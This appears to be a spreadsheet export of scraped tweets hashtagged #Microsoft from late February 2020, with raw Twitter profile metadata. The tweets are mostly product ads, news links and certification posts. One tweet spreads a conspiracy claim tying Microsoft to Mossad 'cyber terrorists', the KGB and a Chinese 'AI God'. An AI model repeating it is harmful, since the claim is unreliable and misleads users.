    <t>{'id': 1110932850650439680, 'id_str': '1110932850650439680', 'name': 'Clearing Radio home of Despejandolv', 'screen_name': 'Clearingradio', 'location': 'Paradise, NV', 'description': 'Clearing radio your LGBTQ online radio home of DespejandoLV 1st Thursday of Month at 5 PM\nMeet the Entertainer Fridays at 11:00AM host @RycHernandez', 'url': 'https://t.co/hrRsTRVNN3', 'entities': {'url': {'urls': [{'url': 'https://t.co/hrRsTRVNN3', 'expanded_url': 'http://www.DespejndoLV.com', 'display_url': 'DespejndoLV.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 22, 'friends_count': 132, 'listed_count': 0, 'created_at': 'Wed Mar 27 15:53:26 +0000 2019', 'favourites_count': 1379, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 306, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1223653901099921408/sV5jjP66_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223653901099921408/sV5jjP66_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1110932850650439680/1580576837',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</si>
  <si>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04:30:14 +0000 2020</t>
  </si>
  <si>
    <t>Threat actors scan Internet for Vulnerable #Microsoft Exchange Servers https://t.co/2Y9Hk4RgDf #SecurityAffairs</t>
  </si>
  <si>
    <t>Fri Feb 28 04:26:55 +0000 2020</t>
  </si>
  <si>
    <t>Check out Lot of 5 Original Xbox 360 Consoles As Is Parts &amp;amp; Repair Only Lot 3 #Microsoft #SModels https://t.co/hMbb1nOt7M via @eBay</t>
  </si>
  <si>
    <t>Fri Feb 28 04:26:07 +0000 2020</t>
  </si>
  <si>
    <t>ITTI is a certified Microsoft Partner with a major focus on D365 Finance and Operations/AX https://t.co/4HMGPLiZPJ . With a presence across the globe, Our Team has delivered complex projects across the world. #MSDYNCOMM #Microsoft #MicrosoftGoldPartner #MicrosoftPartner #Finance https://t.co/7GcyrRR3KJ</t>
  </si>
  <si>
    <t>{'id': 1637857650, 'id_str': '1637857650', 'name': 'ITTI', 'screen_name': 'tweet_itti', 'location': 'Bangalore, Mumbai, USA &amp; UAE', 'description': 'ITTI is an IT consulting and Software Services Company, which is into ERP  solution implementation, application development &amp; infrastrcture management services.', 'url': 'http://t.co/4sdATZQATq', 'entities': {'url': {'urls': [{'url': 'http://t.co/4sdATZQATq', 'expanded_url': 'http://www.itti.com', 'display_url': 'itti.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 97, 'friends_count': 159, 'listed_count': 58, 'created_at': 'Thu Aug 01 12:36:19 +0000 2013', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1026,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'http://pbs.twimg.com/profile_images/950611906850471937/SeI-vhOo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/950611906850471937/SeI-vhOo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1637857650/1535525209',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</si>
  <si>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04:24:17 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, Israeli Mossad cyber terrorists, Russian KGB and Communist China's AI God https://t.co/yTr1fBs3NE #BitChute #Microsoft #backdoors #Talpiot #infosec #cyberattacks #cybersecurite #CyberSecurity</t>
  </si>
  <si>
    <t>{'id': 389281501, 'id_str': '389281501', 'name': 'âŒLPâŒ', 'screen_name': 'PDP00000001', 'location': 'Oceanside, NY', 'description': 'â›“ðŸ‡ºðŸ‡¸  Bill of Rights, Common Law &amp; Christian ðŸ¸', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6643, 'friends_count': 7298, 'listed_count': 316, 'created_at': 'Wed Oct 12 04:37:39 +0000 2011', 'favourites_count': 165306, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 358766,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'http://pbs.twimg.com/profile_images/1080985188056870912/9jwzKL-n_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1080985188056870912/9jwzKL-n_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/389281501/1537584237',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</si>
  <si>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04:22:35 +0000 2020</t>
  </si>
  <si>
    <t>No caption needed. #Microsoft #MicrosoftTeams https://t.co/4OeJdDhjqw</t>
  </si>
  <si>
    <t>{'id': 55395956, 'id_str': '55395956', 'name': 'Ariel De Castro', 'screen_name': 'Arielchris219', 'location': 'Daly City, CA', 'description': 'I.T. Support Technician at Twitter and Product Advisor and Visual Lead at Microsoft.\nHuge techieee ðŸ¤“ðŸ¤“ðŸ¤“\nJust a regular guy living his best life.', 'url': 'https://t.co/vbUMsiGdzv', 'entities': {'url': {'urls': [{'url': 'https://t.co/vbUMsiGdzv', 'expanded_url': 'http://facebook.com/arielchris219', 'display_url': 'facebook.com/arielchris219', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 275, 'friends_count': 599, 'listed_count': 5, 'created_at': 'Thu Jul 09 23:14:35 +0000 2009', 'favourites_count': 1665, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5458,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'http://pbs.twimg.com/profile_images/1221102558116118528/5wJ5yI6g_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1221102558116118528/5wJ5yI6g_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/55395956/1529862463', 'profile_link_color': '00B377',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</si>
  <si>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Feb 28 04:15:57 +0000 2020</t>
  </si>
  <si>
    <t>#Circumflex
#Diaresis
#Tilde
#Grave
#Acute
#Microsoft 
#Windows10
Multilingual enablement for Software. #Cymraeg
Typing #Welsh alphabet, in any program is easy, 
#TOBACH is  very small and easy to use. Just hold [AltGr] when typing  (right of spacebar)
https://t.co/HdnBpHdq66</t>
  </si>
  <si>
    <t>{'id': 1144080048330301440, 'id_str': '1144080048330301440', 'name': 'ðŸ´\U000e0067\U000e0062\U000e0077\U000e006c\U000e0073\U000e007fðŒð°ð§ðœð¢ðƒð¢ð ð¢ðð¨ð¥', 'screen_name': 'flakmwnci', 'location': 'CymruðŸ´\U000e0067\U000e0062\U000e0077\U000e006c\U000e0073\U000e007f', 'description': "Byddwch yn Gwych i'ch gilydd\nBe excellent to each other\n #999Supporter #Guitar\n#WelshLearner #DigitalForensics \n#Electronics Eng #PTSD 97%Human 3%TitaniumCobalt", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 140, 'friends_count': 2186, 'listed_count': 0, 'created_at': 'Thu Jun 27 03:08:34 +0000 2019', 'favourites_count': 907, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 465, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1223370239221673984/RZPAzptA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223370239221673984/RZPAzptA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1144080048330301440/1580955647',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</si>
  <si>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04:10:35 +0000 2020</t>
  </si>
  <si>
    <t>Check out XBOX 360 HD Component Std Composite AV Cable #Microsoft https://t.co/JQ5D9WWxuS via @eBay</t>
  </si>
  <si>
    <t>Fri Feb 28 04:08:01 +0000 2020</t>
  </si>
  <si>
    <t>Love the Way You Work  Use Yammer for Your Next Project
https://t.co/dXvUsKvMlW
#Microsoft #Yammer #network #social #organizations #work #office #communication #marketing #issquared https://t.co/0oKTGCoglG</t>
  </si>
  <si>
    <t>Fri Feb 28 04:06:52 +0000 2020</t>
  </si>
  <si>
    <t>More @Microsoft Course Completions @GlenBenjamin @LANINFOTECH LANInfotech
Intro to Microsoft Dynamics Business Control
Inventory Management in Microsoft Dynamics
Opportunities with GDPR
#microsoftdynamics #businesscontrol #inventory #laninfotech #microsoft #managedservices #gdpr https://t.co/Vg7pXuTWKt</t>
  </si>
  <si>
    <t>Fri Feb 28 04:04:00 +0000 2020</t>
  </si>
  <si>
    <t>Learn how to deploy and configure  #Microsoft #SharePoint Server 2019. Training available in #WalvisBay. 
#Exedin the premier IT Training center  in Namibia https://t.co/A1a6INOLjo</t>
  </si>
  <si>
    <t>Fri Feb 28 04:00:21 +0000 2020</t>
  </si>
  <si>
    <t>Any Business Central users that love March Madness? We have a special bracket just for you 
https://t.co/zysjflShF4
#Microsoft #MarchMadness #ERP #Basketball #Business #SMB #MSDyn365 #BusinessCentral #Games #Bracket #Bracketology | @Microsoft @MSDYN365BC https://t.co/Vs7VZXUklp</t>
  </si>
  <si>
    <t>Fri Feb 28 04:00:20 +0000 2020</t>
  </si>
  <si>
    <t>The entrance of tech giant #Microsoft into the #RPA market is not feared by current vendors.  https://t.co/wqoPvv9KiY
#Robotics #Automation #IoT #Futureofwork #Digital #Tech</t>
  </si>
  <si>
    <t>Fri Feb 28 03:56:19 +0000 2020</t>
  </si>
  <si>
    <t>See how many billed sessions your bot consumes https://t.co/TVt14fWVnP #powerplatform #microsoft #lesscodemorepower #conversationalai #powervirtualagents https://t.co/nnQB0mqz06</t>
  </si>
  <si>
    <t>{'id': 15943542, 'id_str': '15943542', 'name': 'Diganta Kumar', 'screen_name': 'DigantaKumar', 'location': 'Seattle, USA', 'description': 'Diganta Kumar is a Principal Program Manager, ex-AWS, founder, leader, TT-player, husband, &amp; father. I work for @Microsoft and these are my opinions.', 'url': 'https://t.co/Yw59Xoo8fV', 'entities': {'url': {'urls': [{'url': 'https://t.co/Yw59Xoo8fV', 'expanded_url': 'http://digantakumar.net/about', 'display_url': 'digantakumar.net/about', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 373, 'friends_count': 1208, 'listed_count': 44, 'created_at': 'Fri Aug 22 11:03:28 +0000 2008', 'favourites_count': 412, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2511, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/494051909280354304/2AzCXXoY_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/494051909280354304/2AzCXXoY_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15943542/1399653688', 'profile_link_color': '3B94D9', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '1A3F57', 'profile_text_color': '72B9BF', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 03:45:05 +0000 2020</t>
  </si>
  <si>
    <t>Register today for @Axway and @Microsoft webinar on February 27th (French) &amp;amp; March 5th (English version). Discover how Axway #AMPLIFY API Management on @azure benefits your company. #apimanagement #hybrid #microsoft https://t.co/1ULYNWcJgj https://t.co/eIq15SAoYE</t>
  </si>
  <si>
    <t>Fri Feb 28 03:44:49 +0000 2020</t>
  </si>
  <si>
    <t>#Fridays are made to be #enjoyed . #Releive your #stress with going #virtual with #Microsoft #Office365 and #Dynamics365 for #business #collaboration and #financial #results . Plus get 15-20% #Discount . Call (888)511-0143 or Visit https://t.co/fi8EHzgF9M https://t.co/IVwQ32dPwb</t>
  </si>
  <si>
    <t>Fri Feb 28 03:42:51 +0000 2020</t>
  </si>
  <si>
    <t>Of Gods and Kings 
@Zillla_TheGod x @KingFiftyCal 
#GodTier #destiny2 #bungie #montage #clips #gameplays #Microsoft #Xbox #SeriesX #PS5 #Gaming #clip #videogames  #nextgen #abg #zillla #zilllathegod #twitch #esports https://t.co/t8lODZIvo7</t>
  </si>
  <si>
    <t>Fri Feb 28 03:42:32 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, #Sony, EA and others drop out of GDC over coronavirus concerns - CNET https://t.co/wxcmnzFSEH https://t.co/RU4bGv70L6</t>
  </si>
  <si>
    <t>{'id': 1709479412, 'id_str': '1709479412', 'name': 'Technology 4 Today', 'screen_name': 'Technology42day', 'location': '', 'description': 'Tech nerd . Coffeeholic . All about technology will be shared here.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 163, 'friends_count': 3, 'listed_count': 92, 'created_at': 'Thu Aug 29 08:12:21 +0000 2013', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 36787,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'http://pbs.twimg.com/profile_images/874235597694611456/aDn-kWEB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/874235597694611456/aDn-kWEB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1709479412/1497269118',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</si>
  <si>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03:38:50 +0000 2020</t>
  </si>
  <si>
    <t>Want to know a secret? You can create a map in #Microsoft Excel! https://t.co/Iq4tQJEhpC #business</t>
  </si>
  <si>
    <t>Fri Feb 28 03:37:07 +0000 2020</t>
  </si>
  <si>
    <t>Cyberpunk 2077 and Halo Infinite Xbox One Players Will Get Series X Version Free #Microsoft #XboxSeriesX
https://t.co/b21z8INxBc https://t.co/nTma7T0Vyc</t>
  </si>
  <si>
    <t>Fri Feb 28 03:34:14 +0000 2020</t>
  </si>
  <si>
    <t>Unbelievably cool... Arctic World Archive in Svalbard. Data stored for 1,000 years. #Microsoft #github
https://t.co/dw0i5wVLEG</t>
  </si>
  <si>
    <t>{'id': 2499889464, 'id_str': '2499889464', 'name': 'Timothy Yohe', 'screen_name': 'TimYohe', 'location': '', 'description': '#Science #Teacher. #SocialMedia Director. #Blockchain #Energi #Presearch #Hodler Love all things #Crypto $XTZ #Tezos', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1313, 'friends_count': 2111, 'listed_count': 33, 'created_at': 'Fri May 16 21:09:18 +0000 2014', 'favourites_count': 327, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 995,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'http://pbs.twimg.com/profile_images/552213498999361537/jDqruR8a_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/552213498999361537/jDqruR8a_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2499889464/1415840936',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</si>
  <si>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03:30:11 +0000 2020</t>
  </si>
  <si>
    <t>Office 365 Business? Business Premium? E3 or E5? Which #Office365 package is right for my law firm? @bschorr #microsoft  https://t.co/OEaUYBTTwC https://t.co/rHL6SuweGK</t>
  </si>
  <si>
    <t>Fri Feb 28 03:30:09 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft will be trying to penetrate the #RPA market, but current RPA vendors dont fear this player. Why not? Read here.  https://t.co/brV0K73qMD
#Robotics #Automation #IoT #Futureofwork #Digital #Tech</t>
  </si>
  <si>
    <t>Fri Feb 28 03:26:51 +0000 2020</t>
  </si>
  <si>
    <t>Students #collaborating to build a structure in the #Minecraft world. Relying on the team lead to #communicate effectively to the other teammates who where not privy to the task! #Microsoft #teamwork https://t.co/krcozboFDT</t>
  </si>
  <si>
    <t>{'id': 1159159123885211648, 'id_str': '1159159123885211648', 'name': 'Arbour Lake School', 'screen_name': 'ArbourLake_CBE', 'location': '27 Arbour Crest Dr NW', 'description': 'Working collaboratively to create an exemplary middle school experience for our students, Gr. 5-9, in the communities of Arbour Lake, Citadel &amp; Scenic Acres.', 'url': 'https://t.co/C7zXzfPZwb', 'entities': {'url': {'urls': [{'url': 'https://t.co/C7zXzfPZwb', 'expanded_url': 'http://school.cbe.ab.ca/school/arbourlake/about-us/contact/pages/default.aspx', 'display_url': 'school.cbe.ab.ca/school/arbourlâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 117, 'friends_count': 55, 'listed_count': 0, 'created_at': 'Wed Aug 07 17:47:26 +0000 2019', 'favourites_count': 124, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 144, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1159159813592371200/JVViYu1e_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1159159813592371200/JVViYu1e_normal.jpg',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</si>
  <si>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03:25:24 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Windows: What you need to know about what's coming next https://t.co/ionqNsJZ0o #technews #technology #microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 03:19:05 +0000 2020</t>
  </si>
  <si>
    <t>Any Business Central users that love March Madness? We have a special bracket just for you 
https://t.co/XaHujPc0x3
#Microsoft #MarchMadness #ERP #Basketball #Business #SMB #MSDyn365 #BusinessCentral #Games #Bracket #Bracketology | Microsoft MSDYN365BC https://t.co/lrSxSitDq3</t>
  </si>
  <si>
    <t>Fri Feb 28 03:14:25 +0000 2020</t>
  </si>
  <si>
    <t>Thailand aims to make Thailand one of the biggest technology hubs in ASEAN!
https://t.co/D7jLAPx4F1
#cathcartassociates #Thailand #ThailandDigitalValley #ASEAN #Microsoft #Cisco #Google #technology #ITrecruitment https://t.co/m7oDTMdOM7</t>
  </si>
  <si>
    <t>{'id': 4891644141, 'id_str': '4891644141', 'name': 'Cathcart Thailand', 'screen_name': 'CathcartBangkok', 'location': 'Bangkok, Thailand', 'description': 'Specialist #IT #recruitment company based in the heart of #Bangkok proving the best #IT talent and #jobs in #Thailand', 'url': 'https://t.co/nXZgMXFAVm', 'entities': {'url': {'urls': [{'url': 'https://t.co/nXZgMXFAVm', 'expanded_url': 'http://www.cathcartassociates.co.th', 'display_url': 'cathcartassociates.co.th', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 39, 'friends_count': 152, 'listed_count': 16, 'created_at': 'Tue Feb 09 12:03:31 +0000 2016', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 149, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/697039441580445696/81GGQFp4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/697039441580445696/81GGQFp4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4891644141/1466669540',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</si>
  <si>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03:13:07 +0000 2020</t>
  </si>
  <si>
    <t>#BostonDynamics at #Microsoft #TheGarage @ Microsoft Building 27 https://t.co/6rxF5gYirl</t>
  </si>
  <si>
    <t>{'id': 58624900, 'id_str': '58624900', 'name': 'Juan Zabisky ðŸš€', 'screen_name': 'JuanZabisky', 'location': 'Redmond, WA', 'description': 'Working for Microsoft and in pursuit of tech, design, fun and things worth doing. ðŸš€âŒšï¸ðŸ“·ðŸ’¡ðŸš©ðŸ“¢ðŸ’­', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 372, 'friends_count': 2203, 'listed_count': 17, 'created_at': 'Mon Jul 20 23:16:54 +0000 2009', 'favourites_count': 11209, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2535,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'http://pbs.twimg.com/profile_images/917021173065637888/OMUvPGoB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/917021173065637888/OMUvPGoB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/58624900/1469631901', 'profile_link_color': '0E71EB',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</si>
  <si>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Feb 28 03:07:17 +0000 2020</t>
  </si>
  <si>
    <t>#Facebook has cancelled its F8 developer conference, scheduled to take place in May, over concerns about #COVID19. #Microsoft reportedly also decided to pull out of the Game Developers Conference 2020 in San Francisco due to similar concerns https://t.co/KATYLmczTX</t>
  </si>
  <si>
    <t>{'id': 700971797374640128, 'id_str': '700971797374640128', 'name': 'The Business Source', 'screen_name': 'GlobalTimesBiz', 'location': 'Beijing China ', 'description': "The Business Source is a valuable business news and commentary platform at The Global Times, under the People's Daily. Web: https://t.co/1Mpq5RC4l7", 'url': 'https://t.co/Py4J0mHWXf', 'entities': {'url': {'urls': [{'url': 'https://t.co/Py4J0mHWXf', 'expanded_url': 'http://www.globaltimes.cn/source/', 'display_url': 'globaltimes.cn/source/', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/1Mpq5RC4l7', 'expanded_url': 'http://globaltimes.cn/source/', 'display_url': 'globaltimes.cn/source/', 'indices': [124, 147]}]}}, 'protected': False, 'followers_count': 5701, 'friends_count': 341, 'listed_count': 164, 'created_at': 'Sat Feb 20 09:14:34 +0000 2016', 'favourites_count': 229, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10219, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1199317852081152002/cmdbFoJx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1199317852081152002/cmdbFoJx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/700971797374640128/1575874533',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</si>
  <si>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03:06:12 +0000 2020</t>
  </si>
  <si>
    <t>The Azure Application Platform team (@ServiceFabric) is conducting research to better understand the working definition of #serverless and its perceived benefits/tradeoffs in the community today
- Fill out the survey here: https://t.co/Gura2l8bak
#Azure #Microsoft #Cloud https://t.co/jnucY5fZ1n</t>
  </si>
  <si>
    <t>Fri Feb 28 03:05:15 +0000 2020</t>
  </si>
  <si>
    <t>Passed the #Microsoft azure fundamentals! Happy to finally start studying and learning more material for the #azure #developer associates! 
I would say its a very technical cert and kind of dry. Very much on the same level as CompTIA Cloud Essentials was. https://t.co/f1zuowlh2i</t>
  </si>
  <si>
    <t>{'id': 2248051040, 'id_str': '2248051040', 'name': 'RookTKO', 'screen_name': 'RookTKO', 'location': 'United States JBLM, Washington', 'description': "Hello World! I'm a continuous student and jack of all trades. Enjoy my contributions!", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 125, 'friends_count': 29, 'listed_count': 34, 'created_at': 'Mon Dec 16 02:30:23 +0000 2013', 'favourites_count': 804, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1149,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'http://pbs.twimg.com/profile_images/1233420635377782784/1TBQJD_4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233420635377782784/1TBQJD_4_normal.jpg',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</si>
  <si>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03:04:13 +0000 2020</t>
  </si>
  <si>
    <t>Former engineer found guilty of stealing $10M in digital currency from Microsoft https://t.co/4KVOnhfRFK via @SiliconANGLE #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 03:03:18 +0000 2020</t>
  </si>
  <si>
    <t>24 hours of Corporate Madness awaits !!!
#linkedin #snapchat #stories #24hours #corporate #jobs #profile #whatsapp #tiktok #google #alphabet #ceo  #apple #Microsoft #samsung #oneplus #huawei #xiaomi #android
https://t.co/oqU4AXUWCk</t>
  </si>
  <si>
    <t>Fri Feb 28 03:02:41 +0000 2020</t>
  </si>
  <si>
    <t>After flying in space twice, #Microsoft billionaire follows his passion https://t.co/65iRAoNEZK</t>
  </si>
  <si>
    <t>Fri Feb 28 03:00:49 +0000 2020</t>
  </si>
  <si>
    <t>Avanade offers #Microsoft #Dynamics AX Development Services covering Mobile Apps, Integraions, ERP and CRM --&amp;gt; https://t.co/NCQlRwXE4o &amp;lt;-- February 27, 2020 at 10:00PM</t>
  </si>
  <si>
    <t>Fri Feb 28 03:00:29 +0000 2020</t>
  </si>
  <si>
    <t>Read what #SatyaNadella said at the tech #summit, which held in Bengaluru on Tuesday. https://t.co/B0b13fw7Z3
Image Source - Timesofisrael
#techsummit #Microsoft #SoluteLabs #developer https://t.co/zFFGSJyhoK</t>
  </si>
  <si>
    <t>{'id': 2729207516, 'id_str': '2729207516', 'name': 'SoluteLabs', 'screen_name': 'solutelabs', 'location': 'Ahmedabad, India', 'description': 'SoluteLabs is a high-performance team focused on mobile and web design and development; we have produced top #10 chart-topping apps on Android and iOS stores!', 'url': 'https://t.co/w9ACvsnIcf', 'entities': {'url': {'urls': [{'url': 'https://t.co/w9ACvsnIcf', 'expanded_url': 'https://www.solutelabs.com', 'display_url': 'solutelabs.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 461, 'friends_count': 547, 'listed_count': 136, 'created_at': 'Wed Aug 13 11:26:53 +0000 2014', 'favourites_count': 255, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3298,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'http://pbs.twimg.com/profile_images/1169104105555410944/MJ5b9gaD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1169104105555410944/MJ5b9gaD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2729207516/1567571115',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</si>
  <si>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Feb 28 03:00:26 +0000 2020</t>
  </si>
  <si>
    <t>#RPA is a market with a huge forecasted growth. Thats why the tech giants are now trying to penetrate this market. An example of a company who is attempting this is #Microsoft. But current RPA vendors do not fear this new player.  https://t.co/oxkxbg06bz
#Robotics #Automation</t>
  </si>
  <si>
    <t>Fri Feb 28 03:00:15 +0000 2020</t>
  </si>
  <si>
    <t>Check this article that shows how to manage your assets company!
https://t.co/IfqgK9IoEf
#logiframe #advisory #technology #outsourcing #microsoft #xero #jakarta #southjakarta #startup #startuplife #consulting #consultancy #business #fintech #cloudaccounting https://t.co/7eFGOan6Vr</t>
  </si>
  <si>
    <t>Fri Feb 28 03:00:02 +0000 2020</t>
  </si>
  <si>
    <t>The top most requested feature from our #passwordless customers is here finally ! #Microsoft #FIDO2 #Azure #AD #Hybrid #Cloud https://t.co/c0Xpqe588h #MSFTAdvocate</t>
  </si>
  <si>
    <t>Fri Feb 28 02:58:49 +0000 2020</t>
  </si>
  <si>
    <t>#Coronavirus: #Facebook cancels conference, #Microsoft withdraws from another -  definitely a very scary feeling. Exposes our vulnerability in spite of strides in science and technology!!
 #covid19 
 https://t.co/aQx1wBaqcO https://t.co/2fxObGZgIQ</t>
  </si>
  <si>
    <t>{'id': 50651143, 'id_str': '50651143', 'name': 'Nikunj Sanghi', 'screen_name': 'nikunjsanghi', 'location': 'Alwar,Rajasthan,India', 'description': 'Corporate Lawyer to Automobile Dealer, Director-International Affairs ,FADA and now Chairman ASDC. \nRT are not endorsements and views expressed are personal.', 'url': 'https://t.co/qrYTs4enuZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/qrYTs4enuZ', 'expanded_url': 'http://js4wheel.com', 'display_url': 'js4wheel.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3208, 'friends_count': 950, 'listed_count': 79, 'created_at': 'Thu Jun 25 13:54:06 +0000 2009', 'favourites_count': 27630, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 25647,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'http://pbs.twimg.com/profile_images/1005829230536474624/jbtlQDz-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1005829230536474624/jbtlQDz-_normal.jpg',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'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:37 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:36 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:34 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft will be carbon negative by 2030
#Featured #Microsoft
https://t.co/eZofWaaTFJ</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:33 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:32 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:30 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:29 +0000 2020</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#Featured #Microsoft
https://t.co/6SJe2eLBby</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:28 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:27 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:25 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:24 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:23 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:22 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:21 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:20 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:19 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:17 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:16 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:55:15 +0000 2020</t>
  </si>
